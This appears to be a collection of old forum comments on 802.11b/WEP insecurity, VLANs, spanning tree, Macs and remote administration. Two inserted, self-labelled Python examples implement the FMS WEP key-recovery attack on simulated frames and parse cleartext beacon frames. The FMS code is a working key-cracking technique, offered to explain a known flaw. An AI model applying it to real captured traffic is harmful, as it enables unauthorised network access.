Next the RIAA will be paying people to go and trample the big spider's web as they will mistake it for a web based P2P application to facilitate food sharing.
Predictable conclusions - security is mainly compromised through human, not technological factors.
Presumably this is referring to the human failing that was responsible for the flaws in the 802.11b design? 802.11b simply *cannot* be made secure. Beacon frames are not encrypted, MAC addresses are not encrypted. Capture approx 1Gb of network traffic and you can decrypt the WEP key. Once you do that, you are in. There is little difference between the time needed to crack 40-bit and 128-bit WEP keys.
Do not deploy an 802.11b network in an environment where you would not fix cabled LAN ports to the outside of your building with flashing neon signs pointing to them with "PLUG IN HERE!" written on them.
Roll on a truly secure standard.
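The two WEP claims in the comment above (capture enough traffic and the key falls out; 40-bit versus 128-bit barely changes the effort) both rest on the Fluhrer-Mantin-Shamir attack on RC4's key schedule. The simulation below is an added example and not code from the original comments: it builds WEP frames for the weak IVs with a constructed secret key, then recovers that key from nothing but the cleartext IV and the first ciphertext byte of each frame. The function and constant names (capture_weak_iv_traffic, fms_votes, fms_recover, BEAM, SNAP_FIRST_BYTE) and the two test keys are this example's own. "128-bit WEP" is a 104-bit secret plus the 24-bit IV, which is what the 13-byte key models.

```python
"""Added example, not code from the thread: an FMS key-recovery simulation
showing why a longer WEP key buys little.

WEP seeds RC4 with IV || secret_key and sends the 24-bit IV in clear. For
IVs of the form (B+3, 255, X) the first keystream byte leaks secret key
byte B about 5% of the time (Fluhrer, Mantin, Shamir 2001), and a sniffer
knows that byte because every WEP data frame starts with the LLC/SNAP byte
0xAA. Effort is linear in key length: a 104-bit key takes about 13/5 the
weak-IV frames of a 40-bit key. Traffic is constructed in-process with a
key that the attack code never reads.
"""
from collections import Counter

SNAP_FIRST_BYTE = 0xAA   # first plaintext byte of every WEP data frame
BEAM = 32                # partial keys kept per key byte (aircrack-style fudge)


def rc4_ksa(key):
    """RC4 key scheduling; returns the permutation S."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_stream(key, n):
    """First n RC4 keystream bytes for key."""
    s, i, j, out = rc4_ksa(key), 0, 0, bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret_key, iv, plaintext):
    """WEP body encryption: RC4(IV || key) XOR plaintext. (A real frame also
    carries a CRC-32 ICV, which plays no part in this attack.)"""
    keystream = rc4_stream(bytes(iv) + secret_key, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, keystream))


def capture_weak_iv_traffic(secret_key):
    """Simulated sniffing: one frame for each weak IV (B+3, 255, X).
    Returns [(iv, first_ciphertext_byte), ...] and nothing about the key."""
    payload = bytes([SNAP_FIRST_BYTE, 0xAA, 0x03])  # start of an LLC/SNAP header
    frames = []
    for b in range(len(secret_key)):
        for x in range(256):
            iv = (b + 3, 255, x)
            frames.append((iv, wep_encrypt(secret_key, iv, payload)[0]))
    return frames


def fms_votes(frames, prefix):
    """Vote on secret key byte B = len(prefix) given the bytes before it."""
    b, votes = len(prefix), Counter()
    for iv, c0 in frames:
        if iv[0] != b + 3:
            continue
        k = bytes(iv) + prefix               # known part of the session key
        s, j = list(range(256)), 0
        for i in range(b + 3):               # replay the KSA through step B+2
            j = (j + s[i] + k[i]) & 0xFF
            s[i], s[j] = s[j], s[i]
        # "resolved" state: from here the first output byte equals the value
        # that step B+3 swaps into s[B+3] with probability about 5%
        if s[1] >= b + 3 or (s[1] + s[s[1]]) & 0xFF != b + 3:
            continue
        out = c0 ^ SNAP_FIRST_BYTE           # first keystream byte (known plaintext)
        votes[(s.index(out) - j - s[b + 3]) & 0xFF] += 1
    return votes


def fms_recover(frames, key_len):
    """Beam search over the vote tables, then confirm finished candidates
    against captured first bytes (8 matches: a false hit is ~2^-64)."""
    beam = [(0, b"")]                         # (accumulated votes, key prefix)
    for _ in range(key_len):
        expanded = []
        for score, prefix in beam:
            for byte, n in fms_votes(frames, prefix).most_common(BEAM):
                expanded.append((score + n, prefix + bytes([byte])))
        expanded.sort(key=lambda t: -t[0])
        beam = expanded[:BEAM]
    for _, key in beam:
        if all(wep_encrypt(key, iv, bytes([SNAP_FIRST_BYTE]))[0] == c0
               for iv, c0 in frames[:8]):
            return key
    return None


def demo(secret_key):
    """Sniff weak-IV frames for secret_key and recover it.
    Returns (recovered_key_or_None, number_of_frames_used)."""
    frames = capture_weak_iv_traffic(secret_key)
    return fms_recover(frames, len(secret_key)), len(frames)


if __name__ == "__main__":
    # constructed keys: a 40-bit and a 104-bit ("128-bit") WEP key
    for key in (bytes.fromhex("0123456789"), bytes(range(0x10, 0x1d))):
        found, n = demo(key)
        print(f"{len(key) * 8}-bit key, {n} frames: recovered={found == key}")
```

Both keys come back; the 104-bit key uses 3328 weak-IV frames against 1280 for the 40-bit one, so the cost grows linearly with key length rather than exponentially. The beam search mirrors aircrack-ng's fudge factor: a wrongly top-voted byte does not sink the attack, because the other candidates are carried along and the confirmation step picks the full key that actually reproduces the captured keystream bytes.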
It's been interesting reading the replies here to my "drastic" suggestion of disabling spanning tree. Allow me to elaborate...
;)
We've had some very odd issues in the past with spanning tree, and it's for this reason we normally disable it. I do run it on some segments, but there are other segments that literally cannot have it enabled, otherwise things stop working. For example, Apple Macs really don't like spanning tree. (Plugging a Mac server into a spanning tree enabled switch can break it.)
On the rare occasion that we have had a loop, we only lose one segment. When this happens it's noticed, and as it could only have happened from one of several locations, we can easily track down the problem.
VLANs have proven to be quite good at isolating segments from problems on other segments.
Still think I'm crazy?
Well the original message on the site does have a copyright notice at the bottom.
If this trend continues then maybe we will get all spammers putting copyright notices on the bottom of their messages.
All we need to do then is block all messages with copyright symbols in them.
Nice =o)
Do your VLANs share the same physical cable? If so, how are they connected? Do you use a one-armed router?
The whole point of VLANs is so you can put multiple networks along the same cable. We distribute sets of VLANs to edge switches over fibre (and dark fibre to the remote sites at gigabit speed) where they are then separated out into 100Mbit ports on the switches.
"Do you think the answer to having a massive and unreliable network is to build a second identical network?"
I think the answer is to disable spanning tree.
We had a similar problem here (large academic installation, hundreds of workstations, several sites) with things (before my time, I hasten to add) being one Big Flat Network (shudder) using IPX primarily and Novell. Needless to say this was not good. I've since redesigned things using IP and multiple VLANs, however there is still the odd legacy system that needs access to the old net.
My solution was to tap the protocols running in the flat network and to put these into VLANs that can be safely propagated around the layer 3 switched network and presented wherever we wish. The entire "flat" network is tapped into a VLAN, and the IP services that are running on it are routed to. Any problems with either network and we just pull the routes linking the two together, if it were to get that bad.
Funny to see how the Mac community is slowly but surely becoming UNIXified.
Next they will be using the terminal app. Seriously though, transitioning from OS9 to OSX must be a bit like moving from an automatic to a stick shift.
Watch this get modded down because it's mac related.
I thought they were one and the same job - I suppose if you take the definitions literally I see what you mean.
:o)
I do both then. Do I get paid double now?
So people stop using IE, then another browser (say, Opera) takes over as the dominant browser, so spy/adware starts to be targeted at Opera users.
Do we then avoid opera?
The problem is that there are morons out there developing spy / ad / malware, not which browser someone happens to use.
Check this out
Seriously though - you saw it on their site - does this make it legal?
So let's see - using my PPC, Bluetooth card and my T68 GPRS mobile I can connect to the net from anywhere, send and receive email with attachments, use any of the IM clients that run on PPC (such as MSN, Yahoo, ICQ etc.), even use IRC if I need to reach people who are only reachable there.
Also, being a musician who produces music for a singer friend of mine, I have in the past downloaded some of my tracks from the net and used the PPC to play them back using Windows Media Player one night when the CD player broke down at the venue where she was singing.
I can connect wirelessly using 802.11b at work, synchronise my work mail, notes and calendar with my desktop at work; I can even admin a Windows server using the Terminal Services client, wirelessly. I have every note I've ever written about server setup procedures to hand, in a searchable form. I have an eBook reader and MP3 player. I have the ability to use the web from anywhere.
Nah - not worth using.
I suppose a lot of what I use mine for relies on reasonably fast wireless data access, but I forget - you US types don't WANT wireless data services like GPRS, do you? (Or is that just Qualcomm shareholders?)
Seriously - how someone can post on /. that "PDA's are not worth using" escapes me. Simple fact: it depends on what YOUR needs are. If you need a PDA, use one. If you buy one as a gadget and get bored with it, this is your business, but DON'T say that they are not useful, as they obviously are.
Anyone know? Just curious! :o)
It's already being used -- it's the messaging pop-ups in Windows. No way to stop it except shutting down the messaging service
You mean except firewalling TCP port 139 and UDP 137?
The terminals run a console application on a light DOS. Everything is fine so far.
A "console application" connecting to a server via DOS? I bet his "console application" is a telnet client!
Most terrorists will use credit cards and checks without a second thought.
Really? That's very interesting. Now how do you know that? Have you interviewed all terrorists?
They have it all covered. At the bottom of anything that mentions iTunes it says "Don't steal music."
Who is going to disobey that?
I was under the impression - admittedly a glib one - that it's possible to send remote Aqua events using Applescript over any of the network layers.
...
It may be, but not for ARD.
I also was under the impression - mistakenly, since you've said ARD is a bitmap pusher - that ARD used this capability to reduce network clutter.
If only. It's a bitmap pusher, that's all.
The bitmap issue, of course, is key. VNC wins, hands-down - since ARD ain't free.
VNC is also MUCH more reliable and can easily be invoked (and shut down) from a remote shell.
If it came down to it, though, ARD will still get the job done - and may have the added advantage that with a fast network connection, ARD may one day be able to do such things as play Quicktime movies (albeit buffered) seamlessly
ARD is not suitable as an X replacement. For starters, it only supports one client connection at a time. Secondly, it freezes - often. No good having a remote admin tool if it doesn't work. Thirdly, it's bandwidth intensive, as it's a bitmap pusher. Admittedly bandwidth is becoming less of an issue, however the less you need to push around the faster you can do it.
Also, isn't ARD included with all 10.2 Server packages now?
No it isn't, but it should be.
ARD is a screen controller, nothing more. There is also the security aspect - if you are controlling a machine remotely, anyone who is physically able to can see what you are doing and take over at any time. For example - someone sees you log in as the admin, or perhaps root then unplugs the network cable to tinker with the box. This would not be possible with correctly configured X.
A similar thing happened to me - my ex-employer had their mail relay and net gateway running on a SPARC Ultra 5 r00ted (Solaris 2.6, NO PATCHES!!! - what did they expect??). Basically they employ staff to a salary, not a standard. (I wasn't even working in IT at that place, I was teaching media production! - hey, times were hard, you do what you can.) I was asked if I could fix it - I happened to know that they were planning on replacing the Solaris box with an Exchange server (which even they could manage), however they didn't have anyone that knew how to set it up, and I was working for another company.
:o)
I agreed to do a days consultancy for them where I built their new mail server. I left after the day, with their SPARC Ultra 5 which was the deal I negotiated.
...but I don't mind buying a prebuilt machine if it isn't 100% bits I could buy off the shelf (like a Mac, or an SGI box, or a SUN box etc.)
Yeah - I agree totally. I have an old Sun SPARC Ultra 5 for example, which is hardware that you just can't get anywhere else. As for a PC however, I can build them to my precise specs cheaper than I could buy them pre-made. I do a lot of audio recording so I need the performance, hence I have things like LVD-SCSI controllers and LVD drives etc. I choose my motherboards very carefully for performance and expandability.
When buying a pre-made PC you are paying firstly for the cost of someone building it, then of course there are the proprietary things that some manufacturers do that mean you can't simply upgrade the board. At least the guy asking the /. question has checked his board out - I think the simplest option is he rolls his own.
"I'm going to buy a Dell computer which supports DDR RAM, however it only comes with two DIMM slots."
Well there is your problem right there. Buy a machine with a different motherboard. If people keep buying machines with only 2 slots then companies have no incentive to supply boards with more slots. Personally I wouldn't buy a pre-made machine - ever. I prefer to have control over every component. (Obviously I'm not talking about the Mac here.)
I just bought some book shelf brackets yesterday - they could be used to hold 1U or even 2U rackmount kit safely. Cost me under £10 for two wall mounts and the brackets.
Depends on what kit you want to mount of course - I can't see a fridge working well on its side.
Heh - I was wondering if that would get modded down - thought I'd throw in one slightly negative point and one positive point to test a theory of mine - I bet the poor moderator got confused - bless.
At least it's moderately more important than QuickTime getting a point release. Oh wait - that made the front page too.
It certainly looks better than the old er.. shall we say "overly feminine looking" iBook - those used to come with a free mince.
I was fortunate enough to play with a decent spec TiBook last week - rather nice running OSX. Think I just might have to get me one of those...
802.11X protocols also had various mentioned features to make them secure...
I am well versed in 802.11b hacking techniques, and I agree totally that it is extremely vulnerable. Due to flaws in the design it is literally not possible to secure an 802.11b network - it can be compromised so much so that you might as well put wired LAN access ports on the outside of your building with flashing neon signs pointing at them saying "plug in here". The biggest weaknesses of course being that it doesn't encrypt the beacon frames and the fact that there is a certain packet that can be broadcast that will DoS all devices in range.
This doesn't, however, relate to Bluetooth, which does not work in the same manner.
Even in the event of no other security, I think the strongest security "feature" of Bluetooth is its short range, plus the fact you can't connect to some devices unless the user / owner manually sets it to discoverable mode.
I'm not naive enough to assume that this is unbreakable however, but the range thing itself makes it more "secure" than 802.11b.
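The unencrypted beacon frames mentioned in this comment and in the earlier WEP comment are what let a passive listener map a network before touching WEP at all. The parser below is an added example, not code from the original posts: it builds a beacon to the 802.11 management-frame layout and reads back the fields a sniffer sees with no key. The BSSID 00:09:5b:11:22:33, the SSID "corpnet" and the function names (build_beacon, parse_beacon) are constructed for the example.

```python
"""Added example, not code from the thread: reading an 802.11 beacon with no
key at all. Management frames are never WEP-encrypted, so a passive sniffer
gets the BSSID, SSID, channel and the 'privacy' capability bit off the air.
The beacon bytes are constructed here to the 802.11 management-frame layout;
nothing was captured from a real network.
"""
import struct

IE_SSID, IE_RATES, IE_DS_PARAM = 0, 1, 3   # information element IDs
CAP_ESS, CAP_PRIVACY = 0x0001, 0x0010      # capability bits: infrastructure BSS, WEP on
MGMT_HDR_LEN = 24                          # FC, duration, 3 addresses, sequence control


def mac(addr):
    """Render a 6-byte address the way a sniffer would print it."""
    return ":".join(f"{b:02x}" for b in addr)


def build_beacon(bssid, ssid, channel, privacy, seq=0):
    """Construct a minimal beacon: type 0 (management), subtype 8."""
    header = struct.pack("<HH", 0x0080, 0)           # frame control, duration
    header += b"\xff" * 6 + bssid + bssid            # DA broadcast, SA, BSSID
    header += struct.pack("<H", seq << 4)            # sequence control
    cap = CAP_ESS | (CAP_PRIVACY if privacy else 0)
    body = struct.pack("<QHH", 0, 100, cap)          # timestamp, interval (TU), capability
    body += bytes([IE_SSID, len(ssid)]) + ssid.encode()
    body += bytes([IE_RATES, 4, 0x82, 0x84, 0x8B, 0x96])   # 1, 2, 5.5, 11 Mbit/s
    body += bytes([IE_DS_PARAM, 1, channel])
    return header + body


def parse_beacon(frame):
    """Return the cleartext fields a sniffer sees; rejects non-beacons and
    truncated element lists rather than reading past the end of the frame."""
    if len(frame) < MGMT_HDR_LEN + 12:
        raise ValueError("frame too short for a beacon")
    fc, = struct.unpack_from("<H", frame, 0)
    if (fc >> 2) & 0x3 != 0 or (fc >> 4) & 0xF != 8:
        raise ValueError("not a management/beacon frame")
    _timestamp, interval, cap = struct.unpack_from("<QHH", frame, MGMT_HDR_LEN)
    ies, off = {}, MGMT_HDR_LEN + 12
    while off < len(frame):
        if off + 2 > len(frame) or off + 2 + frame[off + 1] > len(frame):
            raise ValueError("truncated information element")
        eid, ln = frame[off], frame[off + 1]
        ies[eid] = frame[off + 2:off + 2 + ln]
        off += 2 + ln
    return {
        "source": mac(frame[10:16]),
        "bssid": mac(frame[16:22]),
        "ssid": ies.get(IE_SSID, b"").decode("utf-8", errors="replace"),
        "channel": ies[IE_DS_PARAM][0] if ies.get(IE_DS_PARAM) else None,
        "wep": bool(cap & CAP_PRIVACY),
        "beacon_interval_tu": interval,
    }


if __name__ == "__main__":
    frame = build_beacon(bytes.fromhex("00095b112233"), "corpnet", 6, privacy=True)
    print(parse_beacon(frame))   # every field readable, no WEP key involved
```

The privacy bit tells the listener that WEP is on, and the source and BSSID addresses are the MACs that a MAC-address filter would be checking, which is why neither hiding the SSID nor filtering addresses adds real security on top of WEP.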